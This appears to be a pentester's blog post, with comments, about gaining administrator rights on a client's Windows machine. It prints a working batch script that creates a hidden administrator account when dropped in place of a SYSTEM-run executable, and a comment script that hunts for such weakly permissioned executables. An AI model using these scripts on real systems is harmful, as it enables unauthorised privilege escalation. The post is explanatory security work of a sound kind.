Usually, on a new system, I like to figure out what's already existing in log files and such. The system had a bunch of automated install files from the image creation and subsequent updates. Out of all the files I parsed, only one had password information in it. The passwords were redacted, though, via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and see if there was an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.
I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not utilized these files in any way I found to execute a file (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.1.1 skills could be of some use :-) Some other files also had weak permissions, but none of them were either in use or going to be assumed to be in use in the foreseeable future. But, here's where it gets funny: many files in Program Files had "BUILTIN\Users:C" or "Everyone:F" (via xcacls.exe).
Pulling up Task Manager showed a list of programs that ran as SYSTEM. The 'exploit' was just replacing (rename, copy) an executable with something that would do a nefarious task. Being ol' school, I whipped up the following batch file and converted it to an EXE:
@echo off
SET OURUSER=YYYYY
SET OURPW=XXXXX
SET OURGROUP=Administrators
:VARS
SET NETEXE=%SYSTEMROOT%\SYSTEM32\net.EXE
SET FINDS=%SYSTEMROOT%\SYSTEM32\findstr.EXE
SET OUTPUT=%SYSTEMROOT%\TEMP\%OURUSER%.TXT
IF EXIST %OUTPUT% DEL %OUTPUT%
echo [X] Attempting to add user %OURUSER%... >> %OUTPUT%
%NETEXE% user %OURUSER% %OURPW% /ADD >> %OUTPUT%
echo [X] Checking user creation... >> %OUTPUT%
%NETEXE% user | %FINDS% "%OURUSER%" >> %OUTPUT%
echo [X] Attempting to add user %OURUSER% to group %OURGROUP%... >> %OUTPUT%
net localgroup %OURGROUP% %OURUSER% /ADD >> %OUTPUT%
echo [X] Checking group addition... >> %OUTPUT%
net localgroup %OURGROUP% | %FINDS% "%OURUSER%" >> %OUTPUT%
Pretty simple. Once converted, I just renamed an EXE, copied this EXE to its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is the client had a HIDS program installed but only turned on to monitor versus block. The HIDS detected the rogue program and might have prevented such an elementary attack.
Sometimes, easy is cheesy, but also just as valid as an 0-day.
[1] Well, this took a little bit of troubleshooting. The batch to EXE converter acted a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.
2 comments:
Excellent work, sir.
And here is some quick and nasty batching to list out file permissions on possible system processes. I'm sure w/ some nice VBS or something this could be automated.
@echo off
del %TEMP%\files.txt
del %TEMP%\systasks.txt
del %TEMP%\sysfiles.txt
del %TEMP%\xcacls.txt
del %TEMP%\xcacls-lines.txt
c:
1>> %TEMP%\files.txt dir /s/b *.exe
1>> %TEMP%\systasks.txt tasklist.exe /FI "USERNAME eq NT AUTHORITY\SYSTEM"
FOR /F "tokens=1 skip=5" %%i IN (%TEMP%\systasks.txt) DO findstr %%i %TEMP%\files.txt 1>> %TEMP%\sysfiles.txt
FOR /F "tokens=*" %%i IN (%TEMP%\sysfiles.txt) DO xcacls.exe "%%i" 1>> %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt findstr /N "^[A-Z].*" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt echo ----
1>> %TEMP%\xcacls-lines.txt findstr /N "BUILTIN\Users:C" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt findstr /N "BUILTIN\Users:F" %TEMP%\xcacls.txt
1>> %TEMP%\xcacls-lines.txt findstr /N "Everyone:F" %TEMP%\xcacls.txt
notepad %TEMP%\xcacls-lines.txt
Post a Comment